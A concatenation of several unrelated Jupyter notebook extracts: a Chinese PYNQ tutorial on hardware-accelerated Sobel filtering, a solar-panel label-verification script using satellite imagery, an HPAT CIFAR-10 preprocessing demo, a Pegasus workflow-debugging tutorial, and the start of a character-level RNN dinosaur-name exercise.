    outframe = hdmi_out.newframe()
    cv2.Sobel(inframe,-1,1,0,ksize=5,dst=outframe)
    inframe.freebuffer()
    hdmi_out.writeframe(outframe)
end = time.time()
print("Frames per second using cv2PYNQ: " + str(iterations / (end - start)))
```
### 步骤3.4:释放HDMI驱动
```
# Shut the HDMI driver down (output first, then input).
hdmi_out.close()
hdmi_in.close()
```
### 步骤3.5:关闭cv2pynq
关闭cv2pynq是一个很重要的步骤,因为在BaseOverlay中的video子系统模块中,图片是以连续的内存数组(contiguous memory arrays)作为存储形式,因此在调用cv2pynq时,可以直接将数据以流的形式传输到PL端。所以,为避免cv2pynq一直占用连续的内存,必须关闭cv2pynq以释放内存;而对连续内存的分配是基于PYNQ的Xlnk库,关于Xlnk的更多详情,可参考:<br>https://pynq.readthedocs.io/en/latest/pynq_libraries/xlnk.html
```
cv2.close()
```
## 附录:PL端是如何加速OPENCV函数处理的
在此项目中式采用一种基于Vivado HLS加速OpenCV程序的方法:<br>其核心是利用Xilinx高层次综合工具Vivado HLS,将C++编写的OpenCV程序按照Vivado HLS处理规范进行修改,进而将代码转换为硬件描述语言,可快速生成IP核。结合Xilinx PYNQ SoC架构,在顶层可直接对我们的Block Design进行Python式的封装,实现OpenCV程序算法向SoC系统的移植和加速。<br>

#### Sobel算子概述
Sobel算子是像素图像边缘检测中最重要的算子之一,在机器学习、数字媒体、计算机视觉等信息科技领域起着举足轻重的作用。在技术上,它是一个离散的一阶差分算子,用来计算图像亮度函数的一阶梯度之近似值。在图像的任何一点使用此算子,将会产生该点对应的梯度矢量或是其法矢量。
#### Sobel算子核心公式(ksize=3)
该算子包含两组3x3的矩阵(当ksize=3时),分别为横向及纵向,将之与图像作平面卷积,即可分别得出横向及纵向的亮度差分近似值。如果以A代表原始图像,Gx及Gy分别代表经横向及纵向边缘检测的图像,其公式如下:
$G_{x}=\begin{bmatrix}
+1&0&-1\\
+2&0&-2\\
+1&0&-1\\
\end{bmatrix}*A$ and
$G_{y}=\begin{bmatrix}
+1&+2&+1\\
0&0&0\\
-1&-2&-1\\
\end{bmatrix}*A$
图像的每一个像素的横向及纵向梯度近似值可用以下的公式结合,来计算梯度的大小。
$G = \sqrt[2]{G_x^2+G_y^2}$
然后可用以下公式计算梯度方向:
$\Theta=arctan(\frac{G_y}{G_x})$
更多关于Sobel算子的详细信息,可参考:<br>https://docs.opencv.org/3.0-beta/doc/tutorials/imgproc/imgtrans/sobel_derivatives/sobel_derivatives.html
#### 在Vivado HLS中映射Sobel算子的结构
在OpenCV中,通过传入dx与dy来求X方向的梯度以及Y方向的梯度从而输出不同方向上的处理结果,
而在本工程中,通过Vivado HLS建立了一个通用的卷积核矩阵IP核(filter2D),其通过接收PS传输的参数来控制卷积核的参数
```python
def Sobel(self,src, ddepth, dx, dy, dst, ksize):
if(ksize == 3):
self.f2D.rows = src.shape[0]
self.f2D.columns = src.shape[1]
self.f2D.channels = 1
if (dx == 1) and (dy == 0) :
if self.filter2DType != 0 :
self.filter2DType = 0
self.f2D.r1 = 0x000100ff #[-1 0 1]
self.f2D.r2 = 0x000200fe #[-2 0 2]
self.f2D.r3 = 0x000100ff #[-1 0 1]
```
上述代码为顶层Python封装时对Sobel函数的部分描述,从中可以获得信息:<br>顶层通过传递dx与dy的值,设置好卷积核的参数,传入IP核(filter2D)中,此处可看出在dx=1,dy=0时(即Sobel算子在X方向的卷积核)与上面对Sobel算子的描述是相同的,下述代码为在Vivado HLS中对IP核的部分描述:
```C
#include "filter2D_hls.h"
// Stream one grayscale frame through a 3x3 2-D convolution.
// r1/r2/r3 carry kernel-row bytes supplied by the PS at run time.
// NOTE(review): the INTERFACE pragmas below look truncated (no port=/bundle=
// arguments) -- confirm against the original HLS source.
void filter2D_hls(wide_stream* in_stream, wide_stream* out_stream, int rows, int cols, int channels, int mode, ap_uint<32> r1, ap_uint<32> r2, ap_uint<32> r3) {
#pragma HLS INTERFACE axis port *
#pragma HLS INTERFACE s_axilite *
#pragma HLS INTERFACE ap_stable *
#pragma HLS dataflow
    GRAY_IMAGE g_img_0(rows,cols);
    GRAY_IMAGE g_img_1(rows,cols);
    const int col_packets = cols*channels/4;
    const int packets = col_packets*rows;
    const int pixel_cnt = rows*cols;
    // Unpack the AXI stream into the input image (low byte of each word).
    for(int r = 0; r < packets; r++){
#pragma HLS pipeline II=4
        ap_uint<32> dat = in_stream->data;
        g_img_0.write(GRAY_PIXEL(dat.range(7,0)));
        ++in_stream;
    }
    const int kernel_size = 3;
    hls::Window<kernel_size,kernel_size,ap_int<8> > kernel;
    // NOTE(review): only kernel[0][0] is loaded here; presumably the full
    // r1/r2/r3 unpacking is elided in this excerpt -- verify.
    kernel.val[0][0] = r1.range(7,0);
    hls::Point_<int> c_point;
    c_point.x=-1;  // (-1,-1) selects the kernel anchor default
    c_point.y=-1;
    hls::Filter2D<hls::BORDER_DEFAULT>(g_img_0,g_img_1,kernel, c_point);
    // Repack the filtered image onto the output stream with TUSER/TLAST framing.
    for(int r = 0; r < rows; r++){
#pragma HLS pipeline II=4
        for(int c = 0; c < col_packets; c++){
            ap_uint<32> dat;
            dat.range(7,0) = g_img_1.read().val[0];;
            out_stream->data = dat;
            out_stream->user = (r == 0 && c == 0)? 1: 0;   // start of frame
            out_stream->last = (r == rows-1 && c == col_packets-1)? 1: 0;  // end of frame
            ++out_stream;
        }
    }
}
```
从Vivado HLS中对IP核的部分描述中,可以得到以下信息:<br>
* 将输入的信息用g_img_0来存储
* 根据PS端传入的r1,r2,r3参数设置卷积核
* 将g_img_0与设置好的卷积核(kernel)进行卷积,卷积结果输出给g_img_1
* 将输出结果赋予out_stream
上述过程简要的描述了Sobel算子在(ksize = 3)的情况下,如何在HLS中编写相应的算法从而生成IP核,并且在上层用Python对IP核进行封装的过程。<br>如要了解更多的关于OpenCV在HLS上的应用,可以参考XAP1167。<br>如需对本UserGuide中的源码有更多的了解,可以参考:<br>https://github.com/xupsh/cv2pynq/blob/XUP/cv2pynq/cv2pynq.py<br>
https://github.com/xupsh/cv2PYNQ-The-project-behind-the-library/blob/master/ip/HLS/filter2D/filter2D_hls.cpp
| github_jupyter |
```
import geopandas as gpd
gpd.options.use_pygeos=False
import os, sys, io
from shapely import geometry
import numpy as np
import matplotlib.pyplot as plt
from area import area
import requests
from functools import partial
from shapely.ops import transform,linemerge, unary_union, polygonize
from shapely.affinity import affine_transform
from functools import partial
import pyproj
from PIL import Image
import descarteslabs as dl
# Make the repository root importable so the project-local solarpv package resolves.
root = os.path.abspath(os.path.join(os.getcwd(),'..','..','..'))
sys.path.append(root)
from solarpv.utils import V_inv
# Google Static Maps API key -- replace with a real key before running.
API_KEY = '<your-api-key>'
def img_poly(ft_poly, mmpix):
    """Project a lon/lat polygon into 800x800 image pixel coordinates.

    Each exterior vertex is placed relative to the polygon centroid using
    the geodesic distance/bearing returned by V_inv, scaled by mmpix
    (metres per pixel), doubled (scale=2 imagery) and centred at (400, 400).
    """
    centre = (ft_poly.centroid.y, ft_poly.centroid.x)  # V_inv wants (lat, lon)
    pixels = []
    for pt in ft_poly.exterior.coords:
        # Vertices are stored (lon, lat); V_inv returns km, so convert to m.
        dist_km, bearing, _ = V_inv(centre, (pt[1], pt[0]))
        radius = dist_km * 1000 / mmpix
        theta = 2. * np.pi * (bearing - 90.) / 360.
        pixels.append((400 + 2 * (radius * np.cos(theta)),
                       400 + 2 * (radius * np.sin(theta))))
    return pixels
def lonlat2pixXY(pt, dt):
    """Invert a GDAL-style geotransform, mapping ground coordinates to pixels.

    pt is an (x, y) ground coordinate; dt is the six-element geotransform
    (origin_x, pixel_w, rot_x, origin_y, rot_y, pixel_h). Returns the
    truncated-integer [column, row] pixel indices.
    """
    dx = pt[0] - dt[0]
    dy = pt[1] - dt[3]
    # Solve the 2x2 affine system for the row first, then back-substitute.
    row = (dy - dt[4] / dt[1] * dx) / (dt[5] - dt[2] * dt[4] / dt[1])
    col = (dx - row * dt[2]) / dt[1]
    return [int(col), int(row)]
def inspect_sample(row,src = 'google'):
    """Render a side-by-side inspection figure for one labelled feature.

    Left panel: high-resolution imagery (Google static map or SPOT, chosen
    by `src`) with the feature polygon overlaid; right panel: a Sentinel-2
    Q4-2018 composite. The figure is saved under data/hand_verify/<uid>.png.
    """
    ft_shp = row['geometry']
    # Normalise to a list of polygons so multi-part features are handled too.
    if ft_shp.type=='MultiPolygon':
        run_polys = list(ft_shp)
    else:
        run_polys = [ft_shp]
    for ii_p,ft_poly in enumerate(run_polys):
        centroid = ft_poly.centroid ##lon,lat
        print ('centroid',centroid)
        ft_bbox = ft_poly.bounds
        Dx = ft_poly.bounds[2]-ft_poly.bounds[0]
        Dy = ft_poly.bounds[3]-ft_poly.bounds[1]
        print (max(abs(Dx),abs(Dy)))
        # Buffered bounding box used as the search context for satellite scenes.
        ft_box = geometry.box(*ft_poly.buffer(max(abs(Dx),abs(Dy))).bounds)
        fig, axs=plt.subplots(1,2,figsize=(24,12))
        if src=='google':
            # Physical side lengths (m) of the bbox via geodesic distances.
            box_sides = (V_inv((ft_bbox[1],ft_bbox[0]),(ft_bbox[1],ft_bbox[2]))[0]*1000,
                V_inv((ft_bbox[1],ft_bbox[0]),(ft_bbox[3],ft_bbox[0]))[0]*1000)
            #print (box_sides)
            side_len = np.ceil(max(box_sides))
            print ('side_len (m)',side_len)
            # Metres-per-pixel for each Google zoom level at this latitude.
            zoom_dict = dict(zip(range(1,21),[156543.03392 * np.cos(centroid.xy[1][0] * np.pi / 180) / np.power(2, z) for z in range(1,21)]))
            #print (zoom_dict) ##<-- METERS PER PIX, not side length
            # Deepest zoom whose 400px tile still covers the feature bbox.
            zoom = np.max(np.argwhere(np.array([(zoom_dict[k]*400-max(box_sides)) for k in range(1,21)])>0.))+1
            #min(zoom_dict.keys(), key=(lambda k: (zoom_dict[k]-max(box_sides))))
            print ('zoom',zoom, zoom_dict[zoom], 'area',area(geometry.mapping(row['geometry'])), np.array(centroid))
            pix_poly = img_poly(ft_poly,zoom_dict[zoom])
            # Fetch the static-map tile centred on the feature centroid.
            urlstr = ''.join(["""https://maps.googleapis.com/maps/api/staticmap?center=""",
                str(centroid.xy[1][0])+""","""+str(centroid.xy[0][0]),
                """&zoom="""+str(zoom),
                """&size=400x400&scale=2&maptype=satellite&format=png&key=""", str(API_KEY)])
            r = requests.get(urlstr, allow_redirects=True)
            #print (r.content)
            image_data = r.content
            image = Image.open(io.BytesIO(image_data))
            image = image.convert('RGB')
            arr = np.asarray(image)
            axs[0].imshow(arr)
            xs, ys = geometry.Polygon(pix_poly).exterior.xy
            #print (geometry.Polygon(pix_poly))
            #print (xs,ys)
            axs[0].plot(xs,ys, color='c', linewidth=2.)
            axs[0].set_title('Google Basemap (indeterminate date), {:.2f}m/px'.format(zoom_dict[zoom]), fontsize=20)
        elif src=='SPOT':
            scenes, ctx = dl.scenes.search(
                ft_box,
                products=['airbus:oneatlas:spot:v2'],
                start_datetime='2015-09-01', end_datetime='2018-12-31', cloud_fraction=0.2, limit=10, processing_level='surface'
            )
            # Newest scene first; older scenes then fill any masked gaps.
            scenes = sorted(scenes, key=lambda k: k.properties.date, reverse=True)
            print ([s.properties.date for s in scenes])
            arr_SPOT = scenes[0].ndarray("red green blue", ctx)
            for s in scenes[1:]:
                fill_por = np.sum(arr_SPOT>0)/np.prod([*arr_SPOT.shape])
                #print (fill_por, np.sum(arr_S2), np.prod([*arr_S2.shape]))
                new_arr = s.ndarray("red green blue", ctx)
                #print ('shapes',new_arr.shape, np.sum(new_arr>0))
                arr_SPOT[new_arr.mask==False]=new_arr.data[new_arr.mask==False]
            scene_crs = scenes[0].properties['crs']
            dt = scenes[0].properties['geotrans']
            dt_shapely = [dt[1],dt[2],dt[4],dt[5],dt[0],dt[3]]
            WGS84 = "+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs"
            wgs_proj = pyproj.Proj(WGS84)
            utm_proj = pyproj.Proj("+init="+scene_crs, preserve_units=True)
            # Re-anchor the geotransform origin to the scene context bounds.
            dt[0] = utm_proj(*ctx.bounds[0:2])[0]
            dt[3] = utm_proj(*ctx.bounds[2:])[1]
            # Reproject the polygon into the scene CRS, then to pixel space.
            projection_func = partial(pyproj.transform, wgs_proj, utm_proj)
            utm_poly = transform(projection_func, ft_poly)
            pix_poly = geometry.Polygon([lonlat2pixXY(c,dt) for c in list(utm_poly.exterior.coords)])
            axs[0].imshow((np.swapaxes(np.swapaxes(arr_SPOT.data,0,2),0,1)/256).clip(0.,1.))
            xs,ys = pix_poly.exterior.xy
            axs[0].plot(xs,ys,c='c',linewidth=2)
            # NOTE(review): SPOT is typically ~1.5 m/px and Sentinel-2 ~10 m/px;
            # the resolution text here and in the Sentinel-2 title below looks
            # swapped -- confirm.
            axs[0].set_title('SPOT {}, 10m/px, , {:d}x{:d}px'.format(scenes[0].properties.date,arr_SPOT.shape[1],arr_SPOT.shape[2]), fontsize=20)
        # Right panel: Sentinel-2 composite over the same context.
        scenes, ctx = dl.scenes.search(
            ft_box,
            products=['sentinel-2:L1C'],
            start_datetime='2018-09-01', end_datetime='2018-12-31', cloud_fraction=0.2, limit=10,
        )
        if len(scenes)>0:
            # Least-cloudy scene first; later scenes fill masked pixels.
            scenes = sorted(scenes, key=lambda k: k.properties.cloud_fraction, reverse=False)
            arr_S2 = scenes[0].ndarray("red green blue", ctx)
            for s in scenes[1:]:
                fill_por = np.sum(arr_S2>0)/np.prod([*arr_S2.shape])
                #print (fill_por, np.sum(arr_S2), np.prod([*arr_S2.shape]))
                new_arr = s.ndarray("red green blue", ctx)
                #print ('shapes',new_arr.shape, np.sum(new_arr>0))
                arr_S2[new_arr.mask==False]=new_arr.data[new_arr.mask==False]
            scene_crs = scenes[0].properties['crs']
            dt = scenes[0].properties['geotrans']
            dt_shapely = [dt[1],dt[2],dt[4],dt[5],dt[0],dt[3]]
            WGS84 = "+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs"
            wgs_proj = pyproj.Proj(WGS84)
            utm_proj = pyproj.Proj("+init="+scene_crs, preserve_units=True)
            dt[0] = utm_proj(*ctx.bounds[0:2])[0]
            dt[3] = utm_proj(*ctx.bounds[2:])[1]
            projection_func = partial(pyproj.transform, wgs_proj, utm_proj)
            utm_poly = transform(projection_func, ft_poly)
            pix_poly = geometry.Polygon([lonlat2pixXY(c,dt) for c in list(utm_poly.exterior.coords)])
            axs[1].imshow((np.swapaxes(np.swapaxes(arr_S2.data,0,2),0,1)/10000*2.5).clip(0.,1.))
            xs,ys = pix_poly.exterior.xy
            axs[1].plot(xs,ys,c='c',linewidth=2)
            axs[1].set_title('Sentinel-2 (Q4 2018), 1.5m/px, , {:d}x{:d}px'.format(arr_S2.shape[1],arr_S2.shape[2]), fontsize=20)
        fig.suptitle(f'uid: {row["unique_id"]},lon:{row["geometry"].representative_point().x:.5f},lat:{row["geometry"].representative_point().y:.5f}', fontsize=26)
        #plt.tight_layout()
        fig.savefig(os.path.join(root,'data','hand_verify',str(row['unique_id'])+'.png'))
        #plt.show()
        plt.close()
    return True
# Load the finalized polygon dataset and index the hand-verified labels.
gdf = gpd.read_file(os.path.join(root,'data','ABCD_finalized.geojson'))
import glob
pos_labels = glob.glob(os.path.join(root,'data','hand_verify','pos','*'))
neg_labels = glob.glob(os.path.join(root,'data','hand_verify','neg','*'))
ind_labels = glob.glob(os.path.join(root,'data','hand_verify','ind','*'))
# Unique ids are encoded in the verified image filenames ("<id>.png").
all_ids = [f.split('/')[-1].split('.')[0] for f in pos_labels+neg_labels+ind_labels]
all_ids
1e4
# Area bins used to stratify the sample (units match gdf['area']).
bins = [1e2,1e3,1e4,1e5,1e6,1e9]
slice_ids = [int(ii) for ii in all_ids]
# Count features per area bin...
for ii in range(len(bins)-1):
    print (ii,((gdf['area']>bins[ii]) & (gdf['area']<=bins[ii+1])).sum())
# ...and how many in each bin are already hand-verified.
for ii in range(len(bins)-1):
    print (len(gdf.loc[gdf['unique_id'].isin(slice_ids) & (gdf['area']>bins[ii]) &(gdf['area']<=bins[ii+1]),:]))
ids = {ii:gdf.loc[(gdf['area']>bins[ii]) &(gdf['area']<=bins[ii+1]),'unique_id'].values.tolist() for ii in range(len(bins)-1)}
np.random.choice(range(7),3)
# Draw a fresh sample to inspect: none from bins 0/3 here, ten from bin 4.
ids_0 = np.random.choice(ids[0],0).tolist()
ids_3 = np.random.choice(ids[3],0).tolist()
ids_4 = np.random.choice(ids[4],10).tolist()
#inspect_set = gdf.iloc[np.random.choice(range(len(gdf)),N_inspect),:]
inspect_set = gdf.loc[gdf['unique_id'].isin(ids_0+ids_3+ids_4),:]
for row in inspect_set.iterrows():
    print (row[0])
# Render an inspection figure for every sampled feature.
for row in inspect_set.iloc[0:,].iterrows():
    print (row[0])#['unique_id'])
    inspect_sample(row[1],src = 'google')
```
### Assess final
```
# Per-bin precision of the detections, estimated from the hand labels:
# mu = pos/(pos+neg), with an approximate 95% half-width of 1.96/(2*sqrt(N)).
pos_ids = [int(f.split('/')[-1].split('.')[0]) for f in pos_labels]
neg_ids = [int(f.split('/')[-1].split('.')[0]) for f in neg_labels]
precision_dict = {}
for ii in range(len(bins)-1):
    pos = ((gdf['unique_id'].isin(pos_ids)) & (gdf['area']>bins[ii]) & (gdf['area']<=bins[ii+1])).sum()
    neg = ((gdf['unique_id'].isin(neg_ids)) & (gdf['area']>bins[ii]) & (gdf['area']<=bins[ii+1])).sum()
    mu = pos/(pos+neg)
    twosigma = 1.96/2/np.sqrt(pos+neg)
    precision_dict[ii] = {
        'ii':ii,
        'm':pos,
        'N':neg+pos,
        'mu':mu,
        '2sigma':twosigma
    }
    print (ii,pos,neg, mu, twosigma)
#m /n +- 1.96/2/sqrt(n)
# Overall precision across all bins.
pos = len(gdf[gdf['unique_id'].isin(pos_ids)])
neg = len(gdf[gdf['unique_id'].isin(neg_ids)])
print (pos,neg, pos/(pos+neg))
(478+196+194)/(478+196+194+13)
#https://math.stackexchange.com/questions/462404/regarding-calculating-the-bias-of-coin-with-uncertainty
```
| github_jupyter |
### Prepare Data
Install pytorch and torchvision:
```bash
conda install pytorch torchvision -c pytorch
```
Download cifar10 data and save to a simple binary file:
```
import torchvision
import os, pickle
import numpy as np
def create_dataset():
    """Download CIFAR-10 (if not cached) and dump the first training
    batch's raw image bytes to train_data.dat for HPAT to read back.

    Side effects: creates ./data/ (via torchvision) and writes
    ./train_data.dat. Raises FileNotFoundError if the expected batch
    file is missing after download.
    """
    # Triggers the download/extract; the dataset object itself is unused.
    torchvision.datasets.CIFAR10(root='./data', download=True)
    fname = "./data/cifar-10-batches-py/data_batch_1"
    # Context manager guarantees the handle is closed even if unpickling
    # raises (the original open/close pair leaked it on error).
    with open(fname, 'rb') as fo:
        entry = pickle.load(fo, encoding='latin1')
    # entry['data'] is the raw uint8 image array from the CIFAR batch.
    entry['data'].tofile("train_data.dat")
```
Now we load and transform the input data using HPAT:
```
import time
import hpat
from hpat import prange
import cv2
# HPAT parallelizes across images itself, so disable OpenCV's own threading.
hpat.multithread_mode = True
cv2.setNumThreads(0) # we use threading across images

@hpat.jit(locals={'images:return': 'distributed'})
def read_data():
    """Load the raw CIFAR bytes, resize each image to 224x224, normalize
    with ImageNet channel statistics, and return images in NCHW layout.

    The 'images:return distributed' annotation makes HPAT return each
    rank's chunk instead of gathering the full array.
    """
    file_name = "train_data.dat"
    blob = np.fromfile(file_name, np.uint8)
    # reshape to images
    n_channels = 3
    height = 32
    width = 32
    n_images = len(blob)//(n_channels*height*width)
    data = blob.reshape(n_images, height, width, n_channels)
    # resize
    resize_len = 224
    images = np.empty((n_images, resize_len, resize_len, n_channels), np.uint8)
    for i in prange(n_images):  # prange: HPAT-parallel loop
        images[i] = cv2.resize(data[i], (resize_len, resize_len))
    # convert from [0,255] to [0.0,1.0]
    # normalize
    # NOTE(review): images is uint8, so the float results below are
    # truncated on assignment -- confirm this matches the intended pipeline.
    u2f_ratio = np.float32(255.0)
    c0_m = np.float32(0.485)
    c1_m = np.float32(0.456)
    c2_m = np.float32(0.406)
    c0_std = np.float32(0.229)
    c1_std = np.float32(0.224)
    c2_std = np.float32(0.225)
    for i in prange(n_images):
        images[i,:,:,0] = (images[i,:,:,0]/ u2f_ratio - c0_m) / c0_std
        images[i,:,:,1] = (images[i,:,:,1]/ u2f_ratio - c1_m) / c1_std
        images[i,:,:,2] = (images[i,:,:,2]/ u2f_ratio - c2_m) / c2_std
    # convert to CHW
    images = images.transpose(0, 3, 1, 2)
    return images

# Time the full distributed read/preprocess pass.
t1 = time.time()
imgs = read_data()
print("data read time", time.time()-t1)
```
The `'images:return': 'distributed'` annotation indicates that chunks of the array `images` are returned in distributed fashion, instead of replicating it, which is the default behavior for return values. The I/O function `np.fromfile`, as well as all operations on images, are parallelized by HPAT.
Let's run a simple resnet18 DNN using pretrained weights as an example. We run only on 100 images for faster demonstration.
```
# Run pretrained ResNet-18 inference on the first 100 preprocessed images.
from torch import Tensor
from torch.autograd import Variable
model = torchvision.models.resnet18(True)  # True = load pretrained weights
t1 = time.time()
res = model(Variable(Tensor(imgs[:100])))
print("dnn time", time.time()-t1)
```
Now we use HPAT to get some statistics on the results.
```
# get top class stats
vals, inds = res.max(1)  # top-1 score and class index per image
import pandas as pd

@hpat.jit(locals={'vals:input': 'distributed', 'inds:input': 'distributed'})
def get_stats(vals, inds):
    """Print summary statistics of the top-1 scores/classes, plus the
    count of images predicted as the class labelled TRUCK (717) here."""
    df = pd.DataFrame({'vals': vals, 'classes': inds})
    stat = df.describe()
    print(stat)
    TRUCK = 717
    print((inds == TRUCK).sum())

# Inputs are annotated as distributed, mirroring read_data's return.
get_stats(vals.data.numpy(), inds.data.numpy())
```
Similar to distributed return annotation, distributed inputs are annotated as well.
| github_jupyter |
# Workflow Debugging
When running complex computations (such as workflows) on complex computing infrastructure (for example HPC clusters), things will go wrong. It is therefore important to understand how to detect and debug issues as they appear. The good news is that Pegasus is doing a good job with the detection part, using for example exit codes, and provides tooling to help you debug. In this notebook, we will be using the same workflow as in the previous one, but introduce an error and see if we can detect it.
First, let's clean up some files so that we can run this notebook multiple times:
```
!rm -f f.a
```

```
import logging
from pathlib import Path
from Pegasus.api import *
logging.basicConfig(level=logging.DEBUG)
# --- Properties ---------------------------------------------------------------
props = Properties()
props["pegasus.monitord.encoding"] = "json"
props["pegasus.catalog.workflow.amqp.url"] = "amqp://friend:donatedata@msgs.pegasus.isi.edu:5672/prod/workflows"
props["pegasus.mode"] = "tutorial" # speeds up tutorial workflows - remove for production ones
props.write() # written to ./pegasus.properties
# --- Replicas -----------------------------------------------------------------
# Deliberate tutorial mistake: the input is written as "f-problem.a" while the
# replica catalog points at "f.a", so stage-in will fail until it is renamed.
with open("f-problem.a", "w") as f:
    f.write("This is sample input to KEG")
fa = File("f.a").add_metadata(creator="ryan")
rc = ReplicaCatalog().add_replica("local", fa, Path(".").resolve() / "f.a")
# --- Transformations ----------------------------------------------------------
# All three logical transformations map onto the same pegasus-keg binary
# already installed on the condorpool site (is_stageable=False).
preprocess = Transformation(
    "preprocess",
    site="condorpool",
    pfn="/usr/bin/pegasus-keg",
    is_stageable=False,
    arch=Arch.X86_64,
    os_type=OS.LINUX
)
findrange = Transformation(
    "findrange",
    site="condorpool",
    pfn="/usr/bin/pegasus-keg",
    is_stageable=False,
    arch=Arch.X86_64,
    os_type=OS.LINUX
)
analyze = Transformation(
    "analyze",
    site="condorpool",
    pfn="/usr/bin/pegasus-keg",
    is_stageable=False,
    arch=Arch.X86_64,
    os_type=OS.LINUX
)
tc = TransformationCatalog().add_transformations(preprocess, findrange, analyze)
# --- Workflow -----------------------------------------------------------------
# Classic "black diamond" DAG: one preprocess fan-out, two parallel
# findrange jobs, one analyze fan-in.
'''
[f.b1] - (findrange) - [f.c1]
/ \
[f.a] - (preprocess) (analyze) - [f.d]
\ /
[f.b2] - (findrange) - [f.c2]
'''
wf = Workflow("blackdiamond")
fb1 = File("f.b1")
fb2 = File("f.b2")
job_preprocess = Job(preprocess)\
    .add_args("-a", "preprocess", "-T", "3", "-i", fa, "-o", fb1, fb2)\
    .add_inputs(fa)\
    .add_outputs(fb1, fb2)
fc1 = File("f.c1")
job_findrange_1 = Job(findrange)\
    .add_args("-a", "findrange", "-T", "3", "-i", fb1, "-o", fc1)\
    .add_inputs(fb1)\
    .add_outputs(fc1)
fc2 = File("f.c2")
job_findrange_2 = Job(findrange)\
    .add_args("-a", "findrange", "-T", "3", "-i", fb2, "-o", fc2)\
    .add_inputs(fb2)\
    .add_outputs(fc2)
fd = File("f.d")
job_analyze = Job(analyze)\
    .add_args("-a", "analyze", "-T", "3", "-i", fc1, fc2, "-o", fd)\
    .add_inputs(fc1, fc2)\
    .add_outputs(fd)
# Dependencies are inferred by Pegasus from the input/output files.
wf.add_jobs(job_preprocess, job_findrange_1, job_findrange_2, job_analyze)
wf.add_replica_catalog(rc)
wf.add_transformation_catalog(tc)
```
## 2. Run the Workflow
```
# Plan and submit the workflow, then block until it finishes. It is
# expected to fail here because f.a was written as f-problem.a above.
try:
    wf.plan(submit=True)\
        .wait()
except PegasusClientError as e:
    print(e)
```
## 3. Analyze
If the workflow failed you can use `wf.analyze()` do get help finding out what went wrong.
```
# Summarize what went wrong in the failed workflow run.
try:
    wf.analyze()
except PegasusClientError as e:
    print(e)
```
In the output we can see `Expected local file does not exist: /home/scitech/notebooks/02-Debugging/f.a` which tells us that an input did not exist. This is because we created it with the wrong name (`f-problem.a`) instead of the intended name (`f.a`).
## 4. Resolving the issue
Let's resolve the issue by renaming the wrongly named input file:
```
!mv f-problem.a f.a
```
## 5. Restart the workflow
We can now restart the workflow from where it stopped. As an alternative to `run()`, you could `plan()` a new instance, but in that case the workflow would start all over again from the beginning.
```
# Resume the existing workflow run from the point of failure.
try:
    wf.run() \
        .wait()
except PegasusClientError as e:
    print(e)
```
## What's Next?
To continue exploring Pegasus, and specifically learn how to debug failed workflows, please open the notebook in `03-Command-Line-Tools/`
| github_jupyter |
# Character level language model - Dinosaurus Island
Welcome to Dinosaurus Island! 65 million years ago, dinosaurs existed, and in this assignment they are back. You are in charge of a special task. Leading biology researchers are creating new breeds of dinosaurs and bringing them to life on earth, and your job is to give names to these dinosaurs. If a dinosaur does not like its name, it might go berserk, so choose wisely!
<table>
<td>
<img src="images/dino.jpg" style="width:250;height:300px;">
</td>
</table>
Luckily you have learned some deep learning and you will use it to save the day. Your assistant has collected a list of all the dinosaur names they could find, and compiled them into this [dataset](dinos.txt). (Feel free to take a look by clicking the previous link.) To create new dinosaur names, you will build a character level language model to generate new names. Your algorithm will learn the different name patterns, and randomly generate new names. Hopefully this algorithm will keep you and your team safe from the dinosaurs' wrath!
By completing this assignment you will learn:
- How to store text data for processing using an RNN
- How to synthesize data, by sampling predictions at each time step and passing it to the next RNN-cell unit
- How to build a character-level text generation recurrent neural network
- Why clipping the gradients is important
We will begin by loading in some functions that we have provided for you in `rnn_utils`. Specifically, you have access to functions such as `rnn_forward` and `rnn_backward` which are equivalent to those you've implemented in the previous assignment.
## <font color='darkblue'>Updates</font>
#### If you were working on the notebook before this update...
* The current notebook is version "3b".
* You can find your original work saved in the notebook with the previous version name ("v3a")
* To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#### List of updates 3b
- removed redundant numpy import
* `clip`
- change test code to use variable name 'mvalue' rather than 'maxvalue' and deleted it from namespace to avoid confusion.
* `optimize`
- removed redundant description of clip function to discourage use of using 'maxvalue' which is not an argument to optimize
* `model`
- added 'verbose mode to print X,Y to aid in creating that code.
- wordsmith instructions to prevent confusion
- 2000 examples vs 100, 7 displayed vs 10
- no randomization of order
* `sample`
- removed comments regarding potential different sample outputs to reduce confusion.
```
import numpy as np
from utils import *
import random
import pprint
```
## 1 - Problem Statement
### 1.1 - Dataset and Preprocessing
Run the following cell to read the dataset of dinosaur names, create a list of unique characters (such as a-z), and compute the dataset and vocabulary size.
```
# Read the dinosaur-name corpus and build the character vocabulary.
data = open('dinos.txt', 'r').read()
data= data.lower()
chars = list(set(data))
data_size, vocab_size = len(data), len(chars)
print('There are %d total characters and %d unique characters in your data.' % (data_size, vocab_size))
```
* The characters are a-z (26 characters) plus the "\n" (or newline character).
* In this assignment, the newline character "\n" plays a role similar to the `<EOS>` (or "End of sentence") token we had discussed in lecture.
- Here, "\n" indicates the end of the dinosaur name rather than the end of a sentence.
* `char_to_ix`: In the cell below, we create a python dictionary (i.e., a hash table) to map each character to an index from 0-26.
* `ix_to_char`: We also create a second python dictionary that maps each index back to the corresponding character.
- This will help you figure out what index corresponds to what character in the probability distribution output of the softmax layer.
```
# Build char<->index lookup tables over the sorted vocabulary
# ("\n" sorts first, so index 0 is the end-of-name token).
chars = sorted(chars)
print(chars)
char_to_ix = { ch:i for i,ch in enumerate(chars) }
ix_to_char = { i:ch for i,ch in enumerate(chars) }
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(ix_to_char)
```
### 1.2 - Overview of the model
Your model will have the following structure:
- Initialize parameters
- Run the optimization loop
- Forward propagation to compute the loss function
- Backward propagation to compute the gradients with respect to the loss function
- Clip the gradients to avoid exploding gradients
- Using the gradients, update your parameters with the gradient descent update rule.
- Return the learned parameters
<img src="images/rnn.png" style="width:450;height:300px;">
<caption><center> **Figure 1**: Recurrent Neural Network, similar to what you had built in the previous notebook "Building a Recurrent Neural Network - Step by Step". </center></caption>
* At each time-step, the RNN tries to predict what is the next character given the previous characters.
* The dataset $\mathbf{X} = (x^{\langle 1 \rangle}, x^{\langle 2 \rangle}, ..., x^{\langle T_x \rangle})$ is a list of characters in the training set.
* $\mathbf{Y} = (y^{\langle 1 \rangle}, y^{\langle 2 \rangle}, ..., y^{\langle T_x \rangle})$ is the same list of characters but shifted one character forward.
